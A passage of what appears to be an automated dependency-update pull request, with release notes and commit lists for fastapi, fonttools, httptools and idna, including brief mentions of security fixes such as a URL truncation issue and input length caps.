href=\"https://redirect.github.com/fastapi/fastapi/pull/15528\"\u003e#15528\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for de (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15527\"\u003e#15527\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for tr (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15526\"\u003e#15526\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for ko (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15525\"\u003e#15525\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for zh-hant (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15524\"\u003e#15524\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for fr (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15522\"\u003e#15522\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for es (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15523\"\u003e#15523\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for zh (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15520\"\u003e#15520\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for ru (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15521\"\u003e#15521\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Fix typos in Spanish LLM-prompt. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15472\"\u003e#15472\u003c/a\u003e by \u003ca href=\"https://github.com/crr004\"\u003e\u003ccode\u003e@​crr004\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eInternal\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e✅ Update tests, don't double dispose the engine. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15587\"\u003e#15587\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⚡️ Speed up test suite via caching and fixture scopes to make it ~24% faster. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/13583\"\u003e#13583\u003c/a\u003e by \u003ca href=\"https://github.com/dikos1337\"\u003e\u003ccode\u003e@​dikos1337\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🔥 Remove config files now in central GitHub repo. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15585\"\u003e#15585\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump urllib3 from 2.6.3 to 2.7.0. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15502\"\u003e#15502\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump idna from 3.11 to 3.15. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15565\"\u003e#15565\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump cloudflare/wrangler-action from 3.15.0 to 4.0.0. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15571\"\u003e#15571\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🔧 Migrate docs from MkDocs to Zensical. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15563\"\u003e#15563\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🔒️ Only allow team members to modify dependencies. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15548\"\u003e#15548\u003c/a\u003e by \u003ca href=\"https://github.com/svlandeg\"\u003e\u003ccode\u003e@​svlandeg\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/82064857539e6286522c347b4b11331b48dd2378\"\u003e\u003ccode\u003e8206485\u003c/code\u003e\u003c/a\u003e 🔖 Release version 0.136.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/c910e0139f983d0e04e2d1d235cd71803afeae34\"\u003e\u003ccode\u003ec910e01\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/063b5bf582d31fb155cc6bc6f88cf512329d0fd5\"\u003e\u003ccode\u003e063b5bf\u003c/code\u003e\u003c/a\u003e ♻️ Do not accept underscore headers when using \u003ccode\u003econvert_underscores=True\u003c/code\u003e (th...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/22b02e26f9e8c7e32bd8266e2b0ebe8bb3a0db2b\"\u003e\u003ccode\u003e22b02e2\u003c/code\u003e\u003c/a\u003e 🔖 Release version 0.136.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/3b252a2a22ba27a8ab83d6bde7d9cddbc5bf738e\"\u003e\u003ccode\u003e3b252a2\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/c7fb7851b3389f24c51701d705458989be53ccbb\"\u003e\u003ccode\u003ec7fb785\u003c/code\u003e\u003c/a\u003e ♻️ Validate Server Sent Event fields to avoid applications from sending broke...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/cb83b83dcf78eab4ea17d504db5abcda705fbdc4\"\u003e\u003ccode\u003ecb83b83\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/00f805cec94c0bf48c1f9a563535a3ab2e6f90ab\"\u003e\u003ccode\u003e00f805c\u003c/code\u003e\u003c/a\u003e ✅ Update tests, don't double dispose the engine (\u003ca href=\"https://redirect.github.com/fastapi/fastapi/issues/15587\"\u003e#15587\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/3675137523dc167981aa3a3c44599b4f3079ccd8\"\u003e\u003ccode\u003e3675137\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/7b57e42986bb4d40c9eb6580537d13fb8e76097e\"\u003e\u003ccode\u003e7b57e42\u003c/code\u003e\u003c/a\u003e 📝 Document \u003ccode\u003e--entrypoint\u003c/code\u003e CLI option (\u003ca href=\"https://redirect.github.com/fastapi/fastapi/issues/15464\"\u003e#15464\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/fastapi/fastapi/compare/0.135.3...0.136.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `fonttools` from 4.62.1 to 4.63.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/fonttools/fonttools/releases\"\u003efonttools's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e4.63.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[ttLib] Add support for Apple Color Emoji \u003ccode\u003ebgcl\u003c/code\u003e table (\u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4065\"\u003e#4065\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003e[ttLib] Add support for \u003ccode\u003eIFT\u003c/code\u003e and \u003ccode\u003eIFTX\u003c/code\u003e tables (Incremental Font Transfer, PatchMapFormat2) (\u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4070\"\u003e#4070\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4072\"\u003e#4072\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003e[otData] Introduce \u003ccode\u003eFieldSpec\u003c/code\u003e dataclass for OpenType table schema definitions, replacing raw tuples in \u003ccode\u003eotData.py\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4076\"\u003e#4076\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003e[Feat] Show \u003ccode\u003ename\u003c/code\u003e table strings as comments next to label IDs in TTX output, matching the convention used by \u003ccode\u003efvar\u003c/code\u003e, \u003ccode\u003eSTAT\u003c/code\u003e, \u003ccode\u003etrak\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4089\"\u003e#4089\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003e[cu2qu] Fix Cython complex-division rounding difference in \u003ccode\u003esplit_cubic_into_three\u003c/code\u003e that could cause ±1 off-curve coordinate shifts (\u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/3928\"\u003e#3928\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4083\"\u003e#4083\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003e[designspaceLib] Fix \u003ccode\u003emap_backward\u003c/code\u003e\u003ccode\u003egooglefonts/ufo2ft#978\u003c/code\u003e\u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4085\"\u003e#4085\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003e[OS/2] Fix \u003ccode\u003esetUnicodeRanges\u003c/code\u003e to accept reserved bits 123-127, restoring round-trip with \u003ccode\u003egetUnicodeRanges\u003c/code\u003e and fixing \u003ccode\u003erecalcUnicodeRanges\u003c/code\u003e crash in the subsetter (\u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4087\"\u003e#4087\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4088\"\u003e#4088\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003e[cython] Declare Cython extensions as free-threading compatible on Python 3.13+, so that importing them on free-threaded Python no longer re-enables the GIL (\u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4073\"\u003e#4073\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4090\"\u003e#4090\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/fonttools/fonttools/blob/main/NEWS.rst\"\u003efonttools's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e4.63.0 (released 2026-05-14)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[ttLib] Add support for Apple Color Emoji \u003ccode\u003ebgcl\u003c/code\u003e table (\u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4065\"\u003e#4065\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003e[ttLib] Add support for \u003ccode\u003eIFT\u003c/code\u003e and \u003ccode\u003eIFTX\u003c/code\u003e tables (Incremental Font Transfer,\nPatchMapFormat2) (\u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4070\"\u003e#4070\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4072\"\u003e#4072\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003e[otData] Introduce \u003ccode\u003eFieldSpec\u003c/code\u003e dataclass for OpenType table schema definitions,\nreplacing raw tuples in \u003ccode\u003eotData.py\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4076\"\u003e#4076\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003e[Feat] Show \u003ccode\u003ename\u003c/code\u003e table strings as comments next to label IDs in TTX output,\nmatching the convention used by \u003ccode\u003efvar\u003c/code\u003e, \u003ccode\u003eSTAT\u003c/code\u003e, \u003ccode\u003etrak\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4089\"\u003e#4089\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003e[cu2qu] Fix Cython complex-division rounding difference in\n\u003ccode\u003esplit_cubic_into_three\u003c/code\u003e that could cause ±1 off-curve coordinate shifts\n(\u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/3928\"\u003e#3928\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4083\"\u003e#4083\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003e[designspaceLib] Fix \u003ccode\u003emap_backward\u003c/code\u003e for many-to-one (flat-segment) axis maps\nthat silently dropped entries via dict comprehension\n\u003ccode\u003egooglefonts/ufo2ft#978\u003c/code\u003e\u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4085\"\u003e#4085\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003e[OS/2] Fix \u003ccode\u003esetUnicodeRanges\u003c/code\u003e to accept reserved bits 123-127, restoring\nround-trip with \u003ccode\u003egetUnicodeRanges\u003c/code\u003e and fixing \u003ccode\u003erecalcUnicodeRanges\u003c/code\u003e crash\nin the subsetter (\u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4087\"\u003e#4087\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4088\"\u003e#4088\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003e[cython] Declare Cython extensions as free-threading compatible on Python 3.13+,\nso that importing them on free-threaded Python no longer re-enables the GIL\n(\u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4073\"\u003e#4073\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4090\"\u003e#4090\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fonttools/fonttools/commit/978d9edccb60ea0e5fbad7015cb11817c3532328\"\u003e\u003ccode\u003e978d9ed\u003c/code\u003e\u003c/a\u003e Release 4.63.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fonttools/fonttools/commit/6b40ecb6f13e076916044ecd8f0fc13ab5f957f6\"\u003e\u003ccode\u003e6b40ecb\u003c/code\u003e\u003c/a\u003e Add changelog entries for 4.63.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fonttools/fonttools/commit/382a35fb5e96c6ff38a1e7775a24e20bf122a66d\"\u003e\u003ccode\u003e382a35f\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4090\"\u003e#4090\u003c/a\u003e from fonttools/fix-freethreading-compat\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fonttools/fonttools/commit/0e999b55f05ad0dd8423f389673a32de9c5199bb\"\u003e\u003ccode\u003e0e999b5\u003c/code\u003e\u003c/a\u003e Declare Cython extensions as free-threading compatible\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fonttools/fonttools/commit/9e55ea54c184b0d4c0830525f72e69c6c1a32691\"\u003e\u003ccode\u003e9e55ea5\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4089\"\u003e#4089\u003c/a\u003e from fonttools/graphite-feat-labels\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fonttools/fonttools/commit/e84db3ab426a251256ebec7904c03dc73e25932b\"\u003e\u003ccode\u003ee84db3a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4088\"\u003e#4088\u003c/a\u003e from fonttools/fix-setUnicodeRanges-bits-123-127\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fonttools/fonttools/commit/d6eabd1edf7bfa950b6b85c393e4c185dee36d7f\"\u003e\u003ccode\u003ed6eabd1\u003c/code\u003e\u003c/a\u003e Feat: show name table strings as comments next to label IDs in ttx\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fonttools/fonttools/commit/7d0902b2e27ec1433b015b3b8a79391d7c8604cb\"\u003e\u003ccode\u003e7d0902b\u003c/code\u003e\u003c/a\u003e OS/2: fix setUnicodeRanges round-trip for reserved bits 123-127\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fonttools/fonttools/commit/06e266ce70ec578d549c2df0e180a84d9323baf2\"\u003e\u003ccode\u003e06e266c\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4085\"\u003e#4085\u003c/a\u003e from fonttools/fix-map-backward-non-injective\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fonttools/fonttools/commit/6d64598a63f83bcd59d29cf3f22dd25343bd9688\"\u003e\u003ccode\u003e6d64598\u003c/code\u003e\u003c/a\u003e Add more tests for map_backward with many-to-one axis maps\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/fonttools/fonttools/compare/4.62.1...4.63.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `httptools` from 0.7.1 to 0.8.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/MagicStack/httptools/releases\"\u003ehttptools's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.8.0\u003c/h2\u003e\n\u003ch1\u003eChanges\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eAdd http-parser and llhttp licenses into the wheels (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/135\"\u003e#135\u003c/a\u003e)\n(by \u003ca href=\"https://github.com/justeph\"\u003e\u003ccode\u003e@​justeph\u003c/code\u003e\u003c/a\u003e in c398a157)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eMark cython module as free-threading compatible (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/139\"\u003e#139\u003c/a\u003e)\n(by \u003ca href=\"https://github.com/kumaraditya303\"\u003e\u003ccode\u003e@​kumaraditya303\u003c/code\u003e\u003c/a\u003e in 28d1db15)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix all typing issues (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/134\"\u003e#134\u003c/a\u003e)\n(by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in a9bda0ed)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eBump llhttp to 9.4.1 (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/145\"\u003e#145\u003c/a\u003e)\n(by \u003ca href=\"https://github.com/fantix\"\u003e\u003ccode\u003e@​fantix\u003c/code\u003e\u003c/a\u003e in e3e8d71e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSecurity: fix URL truncation issue (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/144\"\u003e#144\u003c/a\u003e)\n(by \u003ca href=\"https://github.com/fantix\"\u003e\u003ccode\u003e@​fantix\u003c/code\u003e\u003c/a\u003e in a0283f07 for \u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/142\"\u003e#142\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAllow building with latest setuptools (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/138\"\u003e#138\u003c/a\u003e)\n(by \u003ca href=\"https://github.com/OldManYellsAtCloud\"\u003e\u003ccode\u003e@​OldManYellsAtCloud\u003c/code\u003e\u003c/a\u003e in c403ad1a)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/httptools/commit/cf10ce6f0dae56e61817e67b9bb073dd39d0191a\"\u003e\u003ccode\u003ecf10ce6\u003c/code\u003e\u003c/a\u003e httptools 0.8.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/httptools/commit/a0283f07c8a7a3f81e26135283daa25e4baba3af\"\u003e\u003ccode\u003ea0283f0\u003c/code\u003e\u003c/a\u003e security: fix URL truncation issue (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/144\"\u003e#144\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/httptools/commit/05e6b8e9cf71fed8fa0e4796a2c1a52351b2e182\"\u003e\u003ccode\u003e05e6b8e\u003c/code\u003e\u003c/a\u003e ci: add freethreading 3.14 to the CI matrix (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/146\"\u003e#146\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/httptools/commit/e3e8d71ee946937209aa965400cc2a8710520215\"\u003e\u003ccode\u003ee3e8d71\u003c/code\u003e\u003c/a\u003e Bump llhttp to 9.4.1 (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/145\"\u003e#145\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/httptools/commit/a9bda0edb93da51c68cbf6db791c958166b86249\"\u003e\u003ccode\u003ea9bda0e\u003c/code\u003e\u003c/a\u003e Fix all typing issues (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/134\"\u003e#134\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/httptools/commit/28d1db15eaeaab5bc7d376d2c2035d966b6e1378\"\u003e\u003ccode\u003e28d1db1\u003c/code\u003e\u003c/a\u003e mark cython module as free-threading compatible (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/139\"\u003e#139\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/httptools/commit/c403ad1ad6cc9345834269a0611b74c6ee4bdcfa\"\u003e\u003ccode\u003ec403ad1\u003c/code\u003e\u003c/a\u003e Allow building with latest setuptools (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/138\"\u003e#138\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/httptools/commit/c398a1579a30ba12b5aeed2d7163644947514590\"\u003e\u003ccode\u003ec398a15\u003c/code\u003e\u003c/a\u003e Add http-parser and llhttp licenses into the wheels (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/135\"\u003e#135\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/httptools/commit/4cfdabd31ccfd5ccf9ab8c60992b4348ebcf5a84\"\u003e\u003ccode\u003e4cfdabd\u003c/code\u003e\u003c/a\u003e ci: fix release workflow (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/132\"\u003e#132\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/httptools/commit/ef71da977cde416fcbd570393fe0c1e22d26b56f\"\u003e\u003ccode\u003eef71da9\u003c/code\u003e\u003c/a\u003e Post-release version bump\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/MagicStack/httptools/compare/v0.7.1...v0.8.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `idna` from 3.11 to 3.18\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kjd/idna/blob/master/HISTORY.md\"\u003eidna's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.18 (2026-06-02)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eWhen decoding a domain, add a \u003ccode\u003edisplay\u003c/code\u003e argument that will pass\nthrough invalid labels rather than raising an exception.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.17 (2026-05-28)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSubstantial 75% reduction in memory usage through new data\nstructures and some optimization in processing speed.\u003c/li\u003e\n\u003cli\u003eAdded a general 1024-character input length cap to the public\nvalidation, conversion, and codec entry points. This is well above\nany legitimate domain or label and guards against pathological\ninputs.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.16 (2026-05-22)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd a command-line interface (\u003ccode\u003epython -m idna\u003c/code\u003e, also available as\nthe \u003ccode\u003eidna\u003c/code\u003e script). Encodes or decodes one or more domains supplied\nas arguments or on standard input, with options to select A-label\nor U-label output and control error handling.\u003c/li\u003e\n\u003cli\u003eRaise the minimum supported Python version to 3.9\u003c/li\u003e\n\u003cli\u003eVarious code quality improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.15 (2026-05-12)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnforce DNS-length cap on individual labels early in \u003ccode\u003echeck_label\u003c/code\u003e,\nshort-circuiting contextual-rule processing for oversized input\nwhile staying compatible with UTS 46 usage.\u003c/li\u003e\n\u003cli\u003eTidy core helpers: hoist bidi category sets to module-level\nfrozensets (avoiding per-codepoint list construction), simplify\nlength checks, and reuse the shared \u003ccode\u003e_unicode_dots_re\u003c/code\u003e from\n\u003ccode\u003eidna.core\u003c/code\u003e in the codec module.\u003c/li\u003e\n\u003cli\u003eUse \u003ccode\u003eraise ... from err\u003c/code\u003e for proper exception chaining and\nswitch internal string formatting to f-strings.\u003c/li\u003e\n\u003cli\u003eAllow \u003ccode\u003eflit_core\u003c/code\u003e 4.x in the build backend.\u003c/li\u003e\n\u003cli\u003eExpand the ruff lint set (flake8-bugbear, flake8-simplify,\npyupgrade, perflint) and apply the surfaced fixes; pin lint CI\nto Python 3.14.\u003c/li\u003e\n\u003cli\u003eAdd Dependabot configuration for GitHub Actions.\u003c/li\u003e\n\u003cli\u003eConvert README and HISTORY from reStructuredText to Markdown.\u003c/li\u003e\n\u003cli\u003eReference CVE-2026-45409 for the 3.14 advisory in place of the\ninitial GHSA identifier.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Felix Yan, Stan Ulbrych, and metsw24-max for\ncontributions to this release.\u003c/p\u003e\n\u003ch2\u003e3.14 (2026-05-10)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRemoved opportunity to process long inputs into quadratic\ntime by rejecting oversize inputs up-front. Closes a bypass\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted 